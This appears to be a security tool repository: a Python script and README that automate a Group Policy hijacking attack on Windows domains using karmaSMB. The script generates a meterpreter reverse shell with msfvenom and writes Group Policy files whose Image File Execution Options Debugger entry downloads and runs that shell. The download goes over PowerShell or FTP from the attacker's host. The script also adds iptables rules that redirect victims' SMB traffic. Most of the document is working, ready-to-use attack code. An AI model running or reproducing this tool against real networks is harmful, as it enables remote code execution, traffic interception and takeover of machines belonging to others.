├── GP_hijack.py
├── LICENSE
└── README.md
/GP_hijack.py:
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1 | #!/usr/bin/python3
2 |
3 | # _authors_:
4 | # @whitel1st
5 | # @ShikariSenpai
6 |
7 | import textwrap
8 | import argparse
9 | import os
10 | import sys
11 | import time
12 | import fileinput
13 |
14 | #=== Print style ===
15 | print_style = {
16 | 'empty' : "\n"+"="*8 + " ",
17 | 'question' : "\n"+ " |Quiz| "+" "*1,
18 | 'error' : "\n"+ "|Error|"+" "*2,
19 | 'status' : "\n"+ "|Status|"+" "*1,
20 | 'tab' : " "*9
21 | }
22 |
23 | script_name = "GP_hijack.py"
24 |
25 | #=== Path to folders/files ===
26 | # Get user path (~ for root is /usr/root)
27 | tilda = os.path.expanduser('~')
28 | name_working_folder = 'GPhijack'
29 | path_config_vsftpd = '/etc/vsftpd.conf'
30 | path_folder_ftp = '/srv/ftp/'
31 | path_folder_apache2 = '/var/www/html/'
32 |
33 | # path name where we working
34 | working_path = tilda + '/' + name_working_folder + '/'
35 |
36 | # === Files which karmaSMB will be use ===
37 | all_files = {
38 | "INI":
39 | {
40 | "name":"GPT.INI",
41 | "content":""
42 | },
43 | "inf":
44 | {
45 | "name":"GptTmpl.inf",
46 | "content":""
47 | },
48 | "conf":
49 | {
50 | "name":"KarmaHijack.conf",
51 | "content":""
52 | },
53 | "xml":
54 | {
55 | "name":"Registry.xml",
56 | "content":
57 | {
58 | #
59 | "clsid":"{9CD4B2F4-923D-47f5-A062-E897DD1DAD50}",
60 | #uid
61 | "uid":"{EDB6542F-F709-43B3-92E4-D40109D97B06}",
62 | #(hive)main_folder
63 | "hive":"HKEY_LOCAL_MACHINE",
64 | #(key) path
65 | "key_path":"SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\\",
66 | "key_folder":"calc.exe",
67 | #(name) of value
68 | "name":"debugger",
69 | #(type) of value
70 | "type":"REG_SZ",
71 | #(value) programm to debug
72 | "value":"notepad.exe",
73 | #(changed)
74 | "changed":"2016-01-15 17:34:45"
75 | }
76 | },
77 | "log":
78 | {
79 | "name":"KarmaSMB.log",
80 | "content":""
81 | },
82 | "script_conf":
83 | {
84 | "name":"." + script_name.split('.')[0] + ".conf",
85 | "content":""
86 | }
87 | }
88 |
89 | #=== Content of folders/files ===
90 | text_ini_start_version = 10000
91 |
92 | #=== Impacket ===
93 | impacket_source = 'https://github.com/whitel1st/GP_Hijack'
94 | impacket_file_name = 'impacket-0.9.9.9.zip'
95 |
96 | #=== Iptables rules ===
97 | # 445: REDIRECT tcp -- 0.0.0.0/0 0.0.0.0/0 tcp dpt:445 redir ports 445
98 | # 139: REDIRECT tcp -- 0.0.0.0/0 0.0.0.0/0 tcp dpt:445 redir ports 445
99 | # 138: REDIRECT udp -- 0.0.0.0/0 0.0.0.0/0 udp dpt:138 redir ports 445
100 | iptables_rules_ports = {
101 | 445:"tcp",
102 | 139:"tcp",
103 | 138:"udp"}
104 | iptables_rules_check = []
105 |
106 |
107 | #=== Shell/Payload/Regster ===
108 | #name with extension
109 | name_of_shell = "shell_xx.exe"
110 | shell_delivery_method_default = "PowerShell"
111 |
112 | #=== Services ===
113 | all_services = {
114 | "powershell" : "apache2",
115 | "ftp" : "vsftpd"
116 | }
117 |
118 | #=== Parser ===
119 | parser = argparse.ArgumentParser(
120 | formatter_class=lambda prog: argparse.HelpFormatter(prog,max_help_position=50,width=100),
121 | description = textwrap.dedent('''
122 | This script will help you to automate SMB Hijacking attack
123 | ''')
124 | )
125 | parser.add_argument("mode", choices=['setup','run','config','read'],help="setup - to install impacket and config files; run - to run attack; config - to customize payload; read - to read current configuration")
126 | #[setup]
127 | parser.add_argument("-lip","--local_ip", help="|setup| your IP address")
128 | #[run]
129 | parser.add_argument("-sip", nargs='+', help="|run| IP(s) of Active Airectory server(s) , for which smb2 traffic should be redirected")
130 | #[config]
131 | parser.add_argument("-shway", help="|config| choose way to deliver shell", choices=all_services.keys())
132 | parser.add_argument("-shpath", help="|config| specify path to your shell. Use: '-shpath msf' for default shell")
133 |
134 | args = parser.parse_args()
135 |
136 | #! Yeahh, I know - file names are global. They do not used as a function parameters
137 | class setup:
138 | class create:
139 | def service_vsftpd():
140 | answer_method_vsftp = input(print_style['question'] + "Have you already installed vsftpd? [y/n] : ")
141 | if answer_method_vsftp == "n":
142 | print(print_style['tab'] + "vsftpd will be installed\n")
143 | os.system("apt-get install vsftpd")
144 |
145 | print(print_style['status'] + "Trying to modify vsftpd.conf")
146 | print(print_style['tab'] + "Previous config will be backed up")
147 |
148 | if os.path.isfile(path_config_vsftpd):
149 |
150 | os.system("mv " + path_config_vsftpd + " " + path_config_vsftpd + ".bak")
151 |
152 | vsftpd_conf_bak_file = open(path_config_vsftpd + ".bak", 'r')
153 | vsftpd_conf_text = vsftpd_conf_bak_file.read()
154 |
155 | vsftpd_conf_text = vsftpd_conf_text.replace('listen=NO', 'listen=YES')
156 | vsftpd_conf_text = vsftpd_conf_text.replace('listen_ipv6=YES', 'listen_ipv6=NO')
157 | vsftpd_conf_text = vsftpd_conf_text.replace('anonymous_enable=NO', 'anonymous_enable=YES')
158 |
159 | vsftpd_conf_file = open(path_config_vsftpd, 'w+')
160 | vsftpd_conf_file.write(vsftpd_conf_text)
161 |
162 | vsftpd_conf_file.close()
163 | vsftpd_conf_bak_file.close()
164 |
165 | print(print_style['tab'] + "Result: Success")
166 |
167 | else:
168 | print(print_style['error'] + 'Result: Failed, config file not found')
169 | print(print_style['tab'] + 'Please modify your vsftpd.conf as:')
170 | print(print_style['tab'] + ' listen=YES')
171 | print(print_style['tab'] + ' listen_ipv6=NO')
172 | print(print_style['tab'] + ' anonymous_enable=YES')
173 | def text_payload_inf_shell(all_about_shell,local_ip):
174 | ftp_script_name = "script.txt"
175 |
176 | head = textwrap.dedent("""\
177 | [Unicode]
178 | Unicode=yes
179 | [Registry Values]
180 | """)
181 | body = ""
182 | tail = textwrap.dedent("""
183 | [Version]
184 | signature="$CHICAGO$"
185 | Revision=1
186 | """)
187 |
188 | register_path = {
189 | # IFEO = ImageFileExecutionOptions
190 | "IFEO" : "MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\\",
191 | "Security" : ""
192 | }
193 |
194 | if all_about_shell['way'] == "powershell":
195 | body = "PowerShell \"-nologo (New-Object System.Net.WebClient).DownloadFile(\'http://" + local_ip + "/" + all_about_shell['name'] + "\',\'" + all_about_shell['name'] + "\'); Start-Process \'" + all_about_shell['name'] +"\'\""
196 |
197 | # Works perfectly if such shell file does not exist
198 | # So, to make it works properly - change shell name time to time
199 | elif all_about_shell['way'] == "ftp":
200 | body = "cmd.exe /c \"@echo open " + local_ip + ">" + ftp_script_name + \
201 | "&@echo binary>>" + ftp_script_name + \
202 | "&@echo get /" + all_about_shell['name'] + " C:\\Users\\Public\\Downloads\\" + all_about_shell['name'] + ">>" + ftp_script_name + \
203 | "&@echo quit>>" + ftp_script_name+"&@ftp -s:" + ftp_script_name + " -v -A&@start C:\\Users\\Public\\Downloads\\" + all_about_shell['name'] + '\"' + \
204 | "&@del script.txt"
205 |
206 |
207 | shell_str = head + \
208 | register_path["IFEO"] + \
209 | all_about_shell['debug_programm'] + \
210 | "\Debugger=1," + \
211 | body + \
212 | tail
213 | return({'full':shell_str,'body':body})
214 | def text_payload_xml_shell(uid,key_folder,value):
215 | out = ("",
216 | "" + \
217 | "",
227 | "")
228 | return('\n'.join(out))
229 |
230 | class shell:
231 | def way(way):
232 | if way == "ftp":
233 | setup.create.service_vsftpd()
234 | elif way == "powershell":
235 | print(print_style['status'] + "Powershell will be used\n")
236 | else:
237 | print(print_style['error'] + "Default value will be used\n")
238 |
239 | #argument = path to shell
240 | #copy shell to some folder, depending on type
241 | def path(all_about_shell):
242 | if (all_about_shell['type'] == "custom"):
243 | shell_path_not_correct = True
244 |
245 | #!TODO:Rewrite tihs
246 | # When fuction called from setup mode 'path' must be empty
247 | # When called from config mode, we can use 'path' value
248 | full_path = all_about_shell['path'] + all_about_shell['name']
249 | if os.path.isfile(full_path):
250 | shell_path_not_correct = False
251 |
252 | else:
253 | while shell_path_not_correct:
254 | shell_path = input(print_style['tab'] + "Full path to your shell (without ~): ")
255 | if(os.path.isfile(shell_path) == False):
256 | print(print_style['error'] + "No such file, try again.\n")
257 | else:
258 | shell_path_not_correct = False
259 |
260 | path_position = shell_path.rfind('/')
261 | all_about_shell['path'] = shell_path[:path_position + 1]
262 |
263 | all_about_shell['name'] = shell_path.split('/')[-1]
264 |
265 | if shell_path_not_correct == False:
266 | if all_about_shell['way'] == "powershell":
267 | folder = path_folder_apache2
268 | os.system("cp -f " + all_about_shell['path'] + all_about_shell['name'] + " " + path_folder_apache2)
269 | elif all_about_shell['way'] == "ftp":
270 | folder = path_folder_ftp
271 | os.system("cp -f " + all_about_shell['path'] + all_about_shell['name'] + " " + path_folder_ftp)
272 |
273 | elif all_about_shell['type'] == "msf":
274 |
275 | if all_about_shell['way'] == "powershell":
276 | folder = path_folder_apache2
277 |
278 | elif all_about_shell['way'] == "ftp":
279 | folder = path_folder_ftp
280 |
281 | #[setup] if shell wasn't created
282 | if not all_about_shell['path']:
283 | local_port = input(print_style['question'] + "Please type metasploit listener port number : ")
284 |
285 | print(print_style['status'] + "Please wait; msfvenom is working")
286 | print(" meterpreter would be at {0}:{1}".format(args.local_ip,local_port))
287 |
288 | os.system("msfvenom -p windows/meterpreter/reverse_tcp LHOST=" + args.local_ip + " LPORT=" + local_port + " -f exe > " + folder + all_about_shell['name'])
289 |
290 | #[config] if you need just copy shell to some folder
291 | else:
292 | os.system("cp -f " + all_about_shell['path'] + all_about_shell['name'] + " " + folder + all_about_shell['name'])
293 |
294 | all_about_shell['path'] = folder
295 |
296 | return(all_about_shell)
297 |
298 | class rewrite:
299 | class basic:
300 | def write_to_file(extension,need_to_dedent):
301 | if need_to_dedent:
302 | all_files[extension]["content"] = textwrap.dedent(all_files[extension]["content"])
303 |
304 | file_to_write = open(working_path + all_files[extension]["name"], 'w')
305 | file_to_write.write(all_files[extension]["content"])
306 | file_to_write.close()
307 | print(print_style['tab'] + 'File ' + working_path + all_files[extension]["name"] + ' was created')
308 |
309 | def ini():
310 | all_files["INI"]["content"]= """\
311 | [General]
312 | Version=10000
313 | """
314 | setup.rewrite.basic.write_to_file("INI",True)
315 | def conf():
316 | all_files["conf"]["content"] = """\
317 | INI = """ + working_path + all_files["INI"]["name"] + """
318 | inf = """ + working_path + all_files["inf"]["name"] + """
319 | xml = """ + working_path + all_files["xml"]["name"] + """
320 | """
321 |
322 | setup.rewrite.basic.write_to_file("conf",True)
323 | def inf(all_about_shell,ip):
324 | shell_dict = setup.create.text_payload_inf_shell(all_about_shell,ip)
325 |
326 | all_files["inf"]["content"] = shell_dict['full']
327 |
328 | setup.rewrite.basic.write_to_file("inf",True)
329 | def xml(all_about_shell,ip):
330 | shell_dict = setup.create.text_payload_inf_shell(all_about_shell,ip)
331 |
332 | all_files["xml"]["content"] = setup.create.text_payload_xml_shell(
333 | all_files["xml"]["content"]["uid"],
334 | all_about_shell["debug_programm"],
335 | shell_dict['body'])
336 |
337 | setup.rewrite.basic.write_to_file("xml",True)
338 | def script_conf(all_about_shell):
339 | all_files["script_conf"]["content"] = """\
340 | way = """ + all_about_shell['way'] + """
341 | shell_type = """ + all_about_shell['type'] + """
342 | shell_name = """ + all_about_shell['name'] + """
343 | shell_path = """ + all_about_shell['path'] + """
344 | shell_programm_to_debug = """ + all_about_shell['debug_programm'] + """
345 | """
346 |
347 | setup.rewrite.basic.write_to_file("script_conf",True)
348 |
349 | def stage0_create_dir(self):
350 | print(print_style['empty'] + "Setup[0] creating directory")
351 | os.system("mkdir " + working_path)
352 |
353 | def stage1and2_impacket(self,impacket_source,impacket_file_name):
354 | print(print_style['empty'] + "Setup[1] downloading impacket")
355 | os.system("git clone " + impacket_source + " " + working_path + "impacket/")
356 |
357 | print(print_style['empty'] + "Setup[2] install impacket")
358 | os.chdir(working_path + "impacket/")
359 | os.system("pip install .")
360 |
361 | def stage3_payload(self,all_about_shell):
362 | print(print_style['empty'] + "Setup[3] payload")
363 |
364 | # Way to deliver
365 | print(print_style['question'] + "Choose how your shell your will be delivered. [default is 0]")
366 | print(print_style['tab'] + "0. Via PowerShell and Apache")
367 | print(print_style['tab'] + "1. Via FTP (vsftpd)")
368 | answer_method = input(print_style['tab'] + " : ")
369 |
370 | if answer_method == "0":
371 | all_about_shell['way'] = 'powershell'
372 |
373 | elif answer_method == "1":
374 | all_about_shell['way'] = 'ftp'
375 |
376 | else:
377 | print(print_style['error'] + "Default value will be used\n")
378 | all_about_shell['way'] = shell_delivery_method_default
379 |
380 | setup.shell.way(all_about_shell['way'])
381 |
382 | #Path to shell
383 | print(print_style['question'] + "Choose which type of shell you want to use. [default is 0]")
384 | print(print_style['tab'] + "0. Reverse shell created via msfvenom. Run with metasploit")
385 | print(print_style['tab'] + "1. Custom shell")
386 | answer = input(print_style['tab'] + " : ")
387 |
388 | #Сustom
389 | if answer == "0":
390 | all_about_shell['type'] = 'msf'
391 | elif answer == "1":
392 | all_about_shell['type'] = 'custom'
393 |
394 | all_about_shell = setup.shell.path(all_about_shell)
395 |
396 | return(all_about_shell)
397 |
398 | def stage4_create_files(self, all_about_shell):
399 | print("\n"+"="*8+" Setup[4] create config files")
400 |
401 | #Create files
402 | setup.rewrite.ini()
403 | setup.rewrite.conf()
404 | setup.rewrite.inf(all_about_shell,args.local_ip)
405 | setup.rewrite.xml(all_about_shell,args.local_ip)
406 | setup.rewrite.script_conf(all_about_shell)
407 |
408 | class run:
409 | def kill_karmaSMB(self):
410 | #Because there are more that one process karmaSMB
411 | for i in range(2):
412 | os.system("kill -9 `ps aux | grep karmaSMB | cut -d '\n' -f 2 | cut -d ' ' -f 7` 2> /dev/null")
413 | os.system("kill -9 `ps aux | grep karmaSMB | cut -d '\n' -f 2 | cut -d ' ' -f 6` 2> /dev/null")
414 | os.system("kill -9 `ps aux | grep karmaSMB | cut -d '\n' -f 1 | cut -d ' ' -f 7` 2> /dev/null")
415 | os.system("kill -9 `ps aux | grep karmaSMB | cut -d '\n' -f 1 | cut -d ' ' -f 6` 2> /dev/null")
416 |
417 | def stage0_iptables(self):
418 | print(print_style['empty'] + "Run[0] create/check iptables rules")
419 | existing_rules = os.popen("iptables -t nat -L -n").read().splitlines()
420 |
421 | for ip in args.sip:
422 | for rule in iptables_rules_ports.keys():
423 | iptables_rules_check.append("REDIRECT " + iptables_rules_ports[rule] + " -- 0.0.0.0/0 " + ip + " "*(21-len(ip)) + iptables_rules_ports[rule] + " dpt:" + str(rule) + " redir ports 445")
424 |
425 | if (set(iptables_rules_check) < set(existing_rules)):
426 | print(print_style['tab'] + "|Check| = rules already exist")
427 | else:
428 | print(print_style['tab'] + "|Check| = " + str(len(args.sip)*3) + " rules will be created:")
429 | for ip in args.sip:
430 | for rule in iptables_rules_ports.keys():
431 | os.system("iptables -t nat -A PREROUTING -p "+ iptables_rules_ports[rule] + " -d " + ip + " --dport " + str(rule) + " -j REDIRECT --to-port 445")
432 | print(print_style['tab'] + "iptables -t nat -A PREROUTING -p "+ iptables_rules_ports[rule] + " -d " + ip + " --dport " + str(rule) + " -j REDIRECT --to-port 445")
433 |
434 | def stage1_increment_version(self):
435 | print(print_style['empty'] + "Run[1] increment version in gpt.inin")
436 |
437 | #Open file
438 | file_ini = open(working_path + all_files["INI"]["name"],'r')
439 | ini_existed_text = file_ini.read().splitlines()
440 |
441 | #Looking for version number
442 | number = int(ini_existed_text[1].split('=')[1])
443 | number = number + 1
444 |
445 | print(print_style['tab'] + "next version will be " + str(number))
446 | ini_existed_text[1] = 'Version=' + str(number)
447 |
448 | #Delete file
449 | os.remove(working_path + all_files["INI"]["name"],)
450 | file_ini.close()
451 |
452 | #Create file again
453 | os.system("touch " + working_path + all_files["INI"]["name"])
454 | #Open and write new version
455 |
456 | file_ini = open(working_path + all_files["INI"]["name"],'w')
457 | file_ini.write('\n'.join(ini_existed_text))
458 | file_ini.close()
459 |
460 | def stage2_check_services(self):
461 | print(print_style['empty'] + "Run[2] check services")
462 |
463 | config_is_correct = False
464 |
465 | all_about_shell = c.read_config(working_path + all_files['script_conf']['name'])
466 |
467 | if all_about_shell['way'] == "powershell" or all_about_shell['way'] == "ftp":
468 | print(print_style['status'] + "Service to run: " + all_services[all_about_shell['way']])
469 | print(print_style['tab'] + "Shell name: " + all_about_shell['name'] + '\n')
470 |
471 | sevice = os.popen("service " + all_services[all_about_shell['way']] +" status").read().splitlines()
472 | print('\n'.join(sevice))
473 | if "dead" in sevice[2]:
474 | print(print_style['status'] + "[starting " + all_services[all_about_shell['way']] + " service]")
475 | os.system("service " + all_services[all_about_shell['way']] + " start")
476 | elif "active" in sevice[2]:
477 | print(print_style['status'] + "[" + all_services[all_about_shell['way']] + " is already started]")
478 |
479 | config_is_correct = True
480 | else:
481 | print(print_style['error'] + 'Config is broken: no such delivery type\n')
482 | return(config_is_correct)
483 |
484 | def stage3_run_karmaSMB(self):
485 |
486 | print(print_style['empty'] + "Run[3] run karmaSMB")
487 | try:
488 | msg_log = '\n'+ '='*10 + ' ' + time.strftime('%d.%m.%y %H:%M:%S') + " karmaSMB log " + '='*10 + '\n'
489 | file_log = open(working_path + all_files["log"]["name"],'a')
490 | file_log.write(msg_log)
491 | file_log.close()
492 | os.system("karmaSMB.py -config " + working_path + all_files['conf']['name'] + " " + working_path + all_files['conf']['name'] + " | tee -a " + working_path + all_files['log']['name'])
493 |
494 | except KeyboardInterrupt:
495 | #stop karmaSMB - never working
496 | os.system("kill -9 `ps aux | grep karmaSMB | cut -d '\n' -f 1 | cut -d ' ' -f 7` 2> /dev/null")
497 | sys.exit()
498 |
499 | class config:
500 | def read_config(self, path_to_config):
501 | all_about_shell = {}
502 |
503 | config_file = open(path_to_config,'r')
504 | confit_text = config_file.read()
505 |
506 | all_about_shell['way'] = confit_text.splitlines()[0].split(' = ')[1]
507 | all_about_shell['type'] = confit_text.splitlines()[1].split(' = ')[1]
508 | all_about_shell['name'] = confit_text.splitlines()[2].split(' = ')[1]
509 | all_about_shell['path'] = confit_text.splitlines()[3].split(' = ')[1]
510 | all_about_shell['debug_programm'] = confit_text.splitlines()[4].split(' = ')[1]
511 |
512 | config_file.close()
513 |
514 | print(print_style['status'] + " Delivery way: " + all_about_shell['way'])
515 | print(print_style['tab'] + " Shell type: " + all_about_shell['type'])
516 | print(print_style['tab'] + " name: " + all_about_shell['name'])
517 | print(print_style['tab'] + " path: " + all_about_shell['path'])
518 | print(print_style['tab'] + "Prog to debug: " + all_about_shell['debug_programm'])
519 |
520 | return(all_about_shell)
521 |
522 |
523 | if args.mode == 'setup':
524 | s = setup()
525 |
526 | if args.local_ip:
527 |
528 | s.stage0_create_dir()
529 |
530 | answer = input(print_style['question'] + "Did you already install Impacket? [y/n] : ")
531 |
532 | if answer == 'n':
533 | s.stage1and2_impacket(impacket_source,impacket_file_name)
534 |
535 | elif answer == 'y':
536 | print(print_style['tab'] + "... skipping Setup[1] and Setup[2] then")
537 |
538 | #TODO: if type is msf name shell must be random
539 |
540 | all_about_shell = {
541 | "way" : "",
542 | "type" : "",
543 | "name" : "shell.exe",
544 | "path" : "",
545 | "debug_programm" : "taskhost.exe"
546 | }
547 |
548 | all_about_shell = s.stage3_payload(all_about_shell)
549 | print(all_about_shell)
550 | s.stage4_create_files(all_about_shell)
551 |
552 | print("-"*50 + "\nSetup successfully completed\n" + "-"*50)
553 |
554 | else:
555 | print("In setup mode you need to specify your local ip")
556 | print("Example usage: " + script_name + " setup -lip 192.168.1.100")
557 |
558 | elif args.mode == 'run':
559 |
560 | r = run()
561 | c = config()
562 |
563 | r.kill_karmaSMB()
564 |
565 | if args.sip:
566 | answer = input("Quick quiz: Did you setup your metasploit to handle meterpreter session? [y/n] : ")
567 | if answer == 'y':
568 | r.stage0_iptables()
569 | r.stage1_increment_version()
570 | if r.stage2_check_services():
571 | r.stage3_run_karmaSMB()
572 | elif answer == 'n':
573 | print("You need to run:")
574 | print(" [0] msfconsole")
575 | print(" [1] use multi/handler")
576 | print(" [2] set payload windows/meterpreter/reverse_tcp")
577 | print(" [3] set LPORT ")
578 | print(" [4] set LPORT ")
579 | else:
580 | print(print_style['error'] + "You need to specify IP address(es) of AD server(s)")
581 | print(print_style['tab'] + "Example usage: " + script_name + " run -sip 192.168.10.2 192.168.10.3 192.168.10.4")
582 | sys.exit(0)
583 |
584 | #TODO: add functions call
585 | elif args.mode == 'config':
586 | c = config()
587 |
588 | all_about_shell = c.read_config(working_path + all_files['script_conf']['name'])
589 |
590 | if args.shway or args.shpath:
591 |
592 | answer_ip = input(print_style['question'] + "Your ip : ")
593 |
594 | all_about_shell['debug_programm'] = input(print_style['question'] + "Programm to debug (with .exe) : ")
595 |
596 | if args.shway:
597 | all_about_shell['way'] = args.shway
598 |
599 | #Do you need to install vsftpd?
600 | setup.shell.way(all_about_shell['way'])
601 |
602 | if args.shpath:
603 |
604 | if args.shpath == "msf":
605 |
606 | all_about_shell['type'] = 'msf'
607 |
608 | else:
609 | all_about_shell['type'] = 'custom'
610 |
611 | path_position = args.shpath.rfind('/')
612 | all_about_shell['path'] = args.shpath[:path_position + 1]
613 | all_about_shell['name'] = args.shpath.split('/')[-1]
614 |
615 | #Copying
616 | all_about_shell = setup.shell.path(all_about_shell)
617 |
618 | setup.rewrite.inf(all_about_shell,answer_ip)
619 | setup.rewrite.xml(all_about_shell,answer_ip)
620 | setup.rewrite.script_conf(all_about_shell)
621 |
622 | else:
623 | print(print_style['tab'] + "You need to specify way to deliver payload and (or) path to payload")
624 | print(print_style['tab'] + "Example usage #1 (default msf shell): " + script_name + " config -shpath msf")
625 | print(print_style['tab'] + "Example usage #2 (custom shell) : " + script_name + " config -shway ftp -shpath /root/shells/my_shell.exe")
626 |
627 | elif args.mode == 'read':
628 | if os.path.isfile(working_path + all_files['script_conf']['name']):
629 | c = config()
630 | all_about_shell = c.read_config(working_path + all_files['script_conf']['name'])
631 | else:
632 | print(print_style['error'] + 'Config not found')
633 |
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1 |
2 | # GroupPolicy Hijacking
3 |
4 |
5 | ---
6 |
7 | ## Warning
8 |
9 | Current version of a script will turns on karma smb for all smb traffic.
10 | So when you MiTM your victim and his DC (domain controller), all SMB functionality excep those that need for a Group Policy hijacking **will be lost**!
11 |
12 | ---
13 |
14 | **Version 1.0**
15 |
16 | This script allows you to exploit Group Policy Hijacking attack to get an RCE.
17 |
18 | What it does:
19 |
20 | **Setup mode**
21 |
22 | * Download and setup Impacket (which consists karmaSMB)
23 | * Create necessary files: config and different files to be returned by karma SMB
24 | * Create malicious payload via msfvenom or choose your own script
25 | * Copy paylod to relevant folder
26 |
27 | **Run mode**
28 |
29 | * Check and if necessary creates iptables rules for supplied IP addresses
30 | * Check and if necessary run `apache2` or `vsftpd`
31 | * Increment version `GPT.ini`
32 | * Run karmaSMB with created config (created in setup mode)
33 | * Write logs of karmaSMB activity
34 |
35 | **Config mode**
36 |
37 | * Change a way of the shell delivering
38 | * Change type of the shell: custom or msf
39 |
40 | **Read mode**
41 |
42 | * Read config created in setup mode
43 |
44 |
45 | ## Related research/articles
46 |
47 | - [[MWR Labs] How to own any Windows network with group policy hijacking attacks](https://labs.mwrinfosecurity.com/blog/how-to-own-any-windows-network-with-group-policy-hijacking-attacks/)
48 |
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